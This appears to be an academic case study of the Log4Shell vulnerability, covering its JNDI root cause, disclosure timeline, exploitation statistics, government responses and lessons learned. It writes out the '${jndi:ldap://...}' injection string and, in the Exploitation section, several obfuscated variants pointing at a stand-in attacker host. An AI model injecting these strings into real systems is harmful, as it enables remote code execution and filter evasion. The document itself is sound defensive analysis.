

LOG4J: A CASE STUDY IN OPEN-SOURCE SOFTWARE VULNERABILITY AND GLOBAL RESPONSE

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ABSTRACT

This paper presents a comprehensive case study on the Log4J vulnerability dubbed "Log4Shell," a critical vulnerability discovered within the Log4j library developed by Apache, a software foundation. This paper examines the technical aspects of the exploit, how it allowed attackers to execute arbitrary code remotely, and why it had such a profound global impact. This case study also dives into the response efforts across various sectors, including the open-source community, government agencies, cybersecurity solution vendors, service providers, and impacted organizations. The paper also explores the collaborative efforts undertaken to address the vulnerability and lessons learned and emphasizes the importance of proactive security measures and the need for overall security hygiene.

Keywords: Log4j Vulnerability, Log4Shell, Zero-Day, Incident Response, Case Study.

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INTRODUCTION

The Apache Log4j Project is a widely used open-source software. It provides a logging framework for Java applications. Log4j is part of the Apache Logging Services Project [1], which includes different framework versions for various programming languages. Log4j is simple to use, free to download, and effective in its intended function, making it ubiquitous among Java developers across the globe. It has ended up being used in thousands of software packages. Log4j often works as a library in applications or Java services. Not all users or organizations know they use Log4j. Log4j first came out in October 1999, with version 1.0 released in 2001. The latest version is Log4j 2, which was released in July 2014 [1]. It has received regular updates since and is widely used. In 2013, before the general availability release in 2014, the Log4j team accepted a community submission. The feature intended to ease data storage and retrieval is called “JNDI (Java Naming and Directory Interface) Lookup plugin support [2][3].” This feature continued to exist in subsequent versions of Log4j and was integrated into thousands of applications globally.

On November 24, 2021, a security engineer from the Alibaba Cloud Security team reported a vulnerability to the Apache Software Foundation (ASF) in the JNDI feature [4]. A critical Remote Code Execution (RCE) vulnerability that can be exploited very quickly and received a 10 out of 10 in the Common Vulnerability Scoring System (CVSS) [5]. Log4j emerged as one of the building blocks of most Java applications and was integrated into numerous other software packages; it also meant that organizations may not know where the Log4j framework is used in their environments. The ubiquitous nature of the Log4j framework, the ease at which it can be exploited, and the impact of attackers gaining full control of the compromised system made this a once-in-a-generation security event.

This paper presents a comprehensive case study of the Log4j vulnerability discovered in November 2021, dubbed as ‘Log4shell’. This study investigates the technical aspects of the exploit, how it allowed attackers to execute arbitrary code remotely, and why it had a global impact. This paper analyzes the response strategies implemented across sectors, including the open-source community, cybersecurity solution vendors, service providers, government bodies, and affected organizations. It assesses how effective these responses were, from distributing patches to applying alternate mitigations, detection, threat intelligence sharing, and broader efforts to secure open-source software. Lastly, capture the lessons learned from the incident and guide organizations to be better prepared for the next Log4j-type vulnerability disclosure.

VULNERABILITY

In Java, Java Naming and Directory Interface (JNDI) and Lightweight Directory Access Protocol (LDAP) can be used to locate an object that contains necessary Java objects to perform the programmed function. As per the standard documentation, you can pass an LDAP URL if the LDAP server operates on a different machine; attackers exploited this flexibility to direct a Java program to retrieve and load an object from a server they control by manipulating the LDAP URL. Attackers manipulated the LDAP URL by making Log4j attempt to log a string like “\${jndi:ldap://attacker-domain.com/exploit}.” When this occurs, Log4j connects to the LDAP server at attacker-domain.com to fetch an object, which in turn gives the location of the malicious payload. This payload is then downloaded and executed by the Java program.

Figure 1. Log4Shell vulnerability exploit flow

The primary issue here is that Log4j supports a special syntax, `${prefix:name}`, for evaluating various lookups, where "prefix" identifies the lookup type. For instance, `${java:version}` returns the current Java version. The addition of a JNDI Lookup in 2013 was done in a way that "The JNDI lookup allows variables to be retrieved via JNDI. By default, the key will be prefixed with `java:comp/env/`. However, if the key contains a ":" no prefix will be added" [3]. Without a prefix, as seen in `${jndi:ldap://attacker-domain.com/exploit}`, Log4j queries the specified LDAP server for the object.

Log4j supports these lookups in both its configuration and logging. Therefore, an attacker only needs to inject a string like `${jndi:ldap://attacker-domain.com/exploit}` into any input that gets logged. This could be through a common HTTP header such as User-Agent, which often gets logged, or a Form parameter like a username. Java is used in many more places other than web servers; if the user-supplied malicious input passes through any of the downstream systems and gets logged by Log4j, the attacker can obtain an RCE on the system that logged the malicious string. Vulnerability mitigation options include,

- i. Update Log4j package.
 - a. Java 8 (or later) users upgrade to release Log4j 2.16.0.
 - b. Java 7 users upgrading to release Log4j 2.12.2
- ii. For Log4j users who cannot update their version, there is an option to remove the JndiLookup class from the classpath; here is an example command to remove the .class file from the Log4j jar file.
 - a. `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`

- iii. In case the Log4j 2 vulnerable component cannot be updated, Log4j versions 2.10 to 2.14.1 support the parameter `log4j2.formatMsgNoLookups` to be set to 'true,' to disable the vulnerable feature, `-Dlog4j2.formatMsgNoLookups=true` can be set in the startup scripts of the Java Virtual Machine (JVM)
- iv. Alternatively, applications using Log4j 2.10 to 2.14.1 may set the `LOG4J_FORMAT_MSG_NO_LOOKUPS="true"` environment variable to force this change.
- v. Kubernetes administrators may use "kubectl set env" to set the `LOG4J_FORMAT_MSG_NO_LOOKUPS="true"` environment variable to apply the mitigation across Kubernetes clusters where the Java applications are running Log4j 2.10 to 2.14.1.

DISCOVERY AND DISCLOSURE

On November 24, 2021, a security engineer from the Alibaba Cloud Security team reported the discovery of a vulnerability in Log4j to Apache Software Foundation via email [4]. The engineer included relevant information about the vulnerability, including a description, exact vulnerable code, and a proof-of-concept along with screenshots. On November 29, 2021, ASF made two public pull requests [6][7] and, committed the code with a fix on December 5, 2021, and tagged a release candidate (Log4j-2.15.0-rc1) [9] on December 6, 2021. With more public disclosure of the vulnerability and proof of concepts emerging in the wild, ASF released the first patched version, 2.15.0, publicly available on December 10, 2021. CVE-2021-44228 [10] was also made public that day, earning a perfect base score of 10/10.

Figure 2. Log4Shell Timeline

After the public disclosure of CVE-2021-44228, security researchers discovered and reported additional vulnerabilities. The following list of vulnerabilities was discovered after the disclosure of CVE-2021-44228.

- CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0 (Fixed in version 2.16.0) [13]
- CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0) [15]

- CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.0) [14]
- CVE-2021-44832 (CVSS score: 6.6) - Remote code execution vulnerability affecting Log4j2 versions 2.0-beta7 through 2.17. (Fixed by upgrading to 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later). [16]

EXPLOITATION

Following the public disclosure of the vulnerability on December 10, 2021. Various reports about exploit attempts emerged from cybersecurity solutions vendors, service providers, and large organizations. Globally, security researchers, too, generated a large volume of vulnerability scanning activity [17]. About 400 exploitation attempts per second totaling millions of scanning attempts to identify vulnerable systems.[19]

Figure 3. Log4j attacks per minute from Cloudflare

Palo Alto reported the hits on the Apache Log4j Remote Code Execution Vulnerability threat prevention signature from Dec 10, 2021, to Feb 2, 2022. Palo Alto observed 125 million hits that had triggered the signature. Figure 4 shows the hits per day [20].

Figure 4. Log4j threat attempts/prevented from Palo Alto

Akamai, another behemoth cloud service provider, reported a rate of attempts from Dec 10, 2021, to Dec 16, 2021, showing attempts per hour peaking at ~25 million attempts per hour. Akamai also reported more than half (~57%) of the attacks seen so far are from attackers previously classified as malicious actors in Akamai’s threat intelligence database [21].

Figure 5. Log4j attempts per hour from Akamai.

Check Point, a leading cybersecurity solution provider, reported that their researchers observed nation-state threat actors exploiting the Log4j vulnerability. Notably APT35. They published Indicators of Compromise (IOCs) [22] for the nation-state actor.

Cisco reported [25] the exploitation of this vulnerability by Mirai Botnet on Dec 11, 2021, the very next day after public disclosure. Crowdstrike also reported [23] that nation-state actor Aquatic Panda is in possession of Log4j shell exploit tools. Microsoft also reported [24] the vulnerability being used by multiple tracked nation-state activity groups from China, Iran, North Korea, and Turkey. Activities ranged from experimentation to integrating the vulnerabilities to in-the-wild payload deployment and exploitation against targets.

As cloud service providers and Web Application Firewall operators started to block known malicious exploit patterns, a wide variety of obfuscations emerged to evade pattern-based detection mechanisms.

Notable patterns,

```

${::-nD}i${::-:}
${EnV:K5:-nD}i:
${loWer:Nd}i${uPper::}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controlled_website/payload_to_be_executed }
${jndi:${lower:l}${lower:d}a${lower:p}://attacker_controlled_website/payload_to_be_executed}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker_controlled_website/payload_to_be_executed}
    
```

```

${${::-j}}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-
p}://attacker_controlled_website/payload_to_be_executed}
${${::-j}}nd${::-i}:
${lower:${upper:${lower:${upper:${lower:${upper:${lower:${
upper:${lower:${upper:${lower:${upper:${lower:j}}}}}}}}}}}}}}}}}}}}
    
```

Cloudflare reported the trend of various obfuscations used by attackers from Dec 10, 2021 to Dec 14, 2021. It shows how attackers shifted to new obfuscations as cloud service providers and web application firewall operators used pattern matching to block exploit attempts.

Figure 6. Log4j attack obfuscation trend from Cloudflare.

RESPONSE

In response to the Log4j vulnerability, thousands of security professionals across the globe started research activities to identify and mitigate hundreds of millions of potentially affected devices. Cybersecurity professionals, security solution providers, and private and government organizations globally used social media and formal communication channels to share mitigation tactics and guidance to detect and protect against rampant exploit attempts. Government bodies across the globe stepped in and played a critical role in raising awareness and encouraging actions.

- In the United States, The Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive to federal agencies to address the vulnerability immediately. CISA also launched a web page dedicated to Log4j vulnerability guidance and resources [29]. The Federal Trade Commission (FTC) warned businesses about legal action if they failed to mitigate the vulnerability and protect consumer’s sensitive information.[26]
- The European Union Agency for Cybersecurity (ENISA) issued recommendations for handling this vulnerability. National cybersecurity agencies of individual states as well issued their advisories and provided resources to organizations for detecting and mitigating the vulnerability [27].
- In the United Kingdom, The National Cyber Security Centre (NCSC) issued guidance to organizations to protect their systems. The NCSC also worked closely with the cybersecurity community and industry experts to understand the vulnerability’s impact on the UK’s interests.
- In Canada, The Canadian Centre for Cyber Security issued advisories and provided detailed mitigation strategies to organizations. They also provided a vulnerability assessment tool to detect the presence of Log4Shell vulnerability.

- In Australia, The Australian Cyber Security Centre (ACSC) released advisories and urged organizations to take immediate action to patch affected systems. The ACSC also provided a list of affected vendors and products.
- In Germany, The Federal Office for Information Security (BSI) issued security advisories and offered recommendations for identifying and mitigating the Log4j vulnerability.
- In Japan, The Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) and the National Center of Incident Readiness and Strategy for Cybersecurity (NISC) provided alerts and guidelines for remediation.
- In Singapore, The Cyber Security Agency of Singapore (CSA) released advisories to public and private sector organizations to take immediate action against the Log4j vulnerability.
- In India, The Indian Computer Emergency Response Team (CERT-In) issued high-severity alerts and provided mitigation measures for organizations.
- Center for Internet Security (CIS) encouraged members to contact their Security Operations Center (SOC) for assistance and provided resources for detecting vulnerable software and manual mitigation techniques.

Genesis of The Alpha-Omega Project

The Alpha Omega Project was conceived as a direct response to the global impact Log4shell vulnerability had. by the log4j vulnerability (CVE-2021-44228) discovered in late 2021. The widespread impact of the vulnerability, affecting millions of systems worldwide and spanning numerous industries, urged the OpenSource Security Foundation (OpenSSF) to announce the Alpha-Omega Project to improve the security posture of open-source software (OSS) through direct engagement of software security experts and automated security testing. The core aspects of the Alpha-Omega project are as follows:

- **Comprehensive Vulnerability Scanning:** At its core, the Alpha Omega Project aims to develop advanced tools for scanning software dependencies, including libraries and frameworks, for known vulnerabilities. Unlike traditional scanners, these tools will be designed to integrate seamlessly into continuous integration/continuous deployment (CI/CD) pipelines, ensuring real-time detection and mitigation of risks.
- **Enhanced Open-Source Security:** Recognizing the critical role of open-source software, the project will focus on strengthening the security of these components. This involves creating a centralized vulnerability database that will be continuously updated, facilitating prompt patching and updates by open-source developers.
- **Collaboration and Intelligence Sharing:** The aim is to foster cooperation between cybersecurity researchers, organizations, and software developers to enable systematic intelligence sharing about emerging threats.
- **Education and Awareness:** Understanding that the human factor plays a significant role in cybersecurity, the Alpha Omega Project includes initiatives to educate developers, system administrators, and end-users about best practices for security hygiene.

LESSONS LEARNED

No one can predict when the next Log4j type incident will happen. One of the aims of this case study is to examine the nature of the event, root cause, and global response and derive insights to prepare for the next Log4j type incident. The lessons learned can guide future approaches in

recognizing, addressing, and preventing similar vulnerabilities in open-source software projects. This section provides a summary of the lesson we should learn.

Organizations should maintain accurate IT asset and application inventory

Knowing exactly what software and what versions are running allows organizations to quickly determine if they are vulnerable to emerging threats and vulnerabilities. With a detailed inventory, organizations can prioritize their response efforts effectively and focus first on the most critical systems. Understanding the entire landscape of deployed software helps organizations respond to zero days and improve their overall security posture by identifying unnecessary and end-of-life software that no longer receives updates.

Knowing which third-party or open-source software is in use can help manage risk associated with vendor-supplied software components. This is not a novel lesson learned from this incident; proper IT assets and application inventory are a part of the basic security hygiene every organization should strive for. This capability has become indispensable with the ubiquitous use of open-source software and the upward trend in zero-day discovery and general vulnerability discovery.

Build capabilities to know Software Bill of Material (SBOM)

The time for the Software Bill of Material has come. Application inventory helps to address asset risk and respond to an incident in a manner where critical systems are addressed first. For incidents like Log4j, organizations should have the capability to know what software components make up an application; this applies to self-developed systems and software procured from third parties. Software development today is closer to assembling building blocks than writing all the code for everything from scratch. So, it is critical to know what blocks make up an application. When an event like this requires us to identify whether some library or component is used in an organization's environment, that lack of traceability becomes a major pain point.

Organizations need this ability to identify vulnerable software to facilitate swift response quickly. Traceability capabilities like SBOM are evolving, and it is already mature in the containerization space. Organizations should adopt these technologies and build capabilities to know and measure impact when the next log4J type vulnerability is discovered.

Back to basics, the importance of good security posture

The answer to most of the advanced threats and endemic vulnerabilities like Log4j is maintaining a good security posture. It includes having robust control over egress traffic from an organization's private or cloud environment. In the specific case of Log4j, the exploit would not be successful if best practices were followed in controlling outbound LDAP connection to the internet. Instead of allowing any outbound LDAP connection, the egress firewall should only allow the connection to the specific, authorized endpoint that may require that.

Maintaining good network security posture is vital in preventing attempts to exploit Log4j type vulnerabilities. A modern organization's IT footprint is no longer confined to private data centers and managed employee endpoints; with the adoption of Cloud, SaaS, PaaS, and IaaS, an organization's boundary has expanded dramatically, and maintaining a good basic security posture is more important than ever. A chain of exploits is required to successfully execute an attack; cutting off any piece of that chain is often enough to prevent full exploitation. Maintaining a good security posture will yield that.

Develop critical response capabilities

Maintaining robust response capabilities, such as having complete control over an organization's ingress (incoming) and egress (outgoing) network traffic is critical in responding to Log4j type incidents. Modern IT footprint has extended beyond the traditional on-premises data center with the advent of cloud and SaaS; controlling ingress and egress is not about just maintaining on-premises firewalls; extended capabilities to cover the SaaS and cloud services are vital in defending against Log4j type incidents.

Complete control over ingress and egress traffic allows organizations to detect unusual patterns or signs of exploitation attempts early. Monitoring incoming traffic for exploitation attempts and outgoing traffic for signs of data exfiltration or command and control (C2) communications should be a staple for any modern organization. Organizations can quickly mitigate the threat by blocking malicious traffic or isolating affected systems if an exploit attempt is detected. Effective control over network traffic is essential for incident response efforts. It allows responders to contain the breach, analyze traffic for forensic evidence, and understand the scope of the attack.

CONCLUSION

Log4Shell presents a pivotal moment in the history of cybersecurity. It reminds us of the importance of the vulnerabilities in open-source software and how a critical vulnerability in a ubiquitous humble logging framework can cause a global cybersecurity crisis. This case study has dissected the multifaceted nature of the Log4j vulnerability, from its technical underpinnings to its widespread ramifications across organizations globally. By examining the nature, root cause, and characteristics of the vulnerability and the efforts to mitigate it, this research illuminates the importance of carrying the lessons learned to strengthen an organization's security posture further and devise a strategy to be resilient against situations like this.

The Log4Shell incident highlighted the double-edged sword of open-source software's ubiquity and utility against potential security vulnerabilities. It highlights the critical role of accurate IT asset and application inventories in organizations. The incident also highlights the significance of mature response capabilities and good security posture, foundational to mitigating the impacts of such vulnerabilities. The Log4Shell incident, while challenging, offers a blueprint for future responses to cybersecurity vulnerabilities, emphasizing the importance of preparedness, collaboration, and the continuous evolution of cybersecurity practices..

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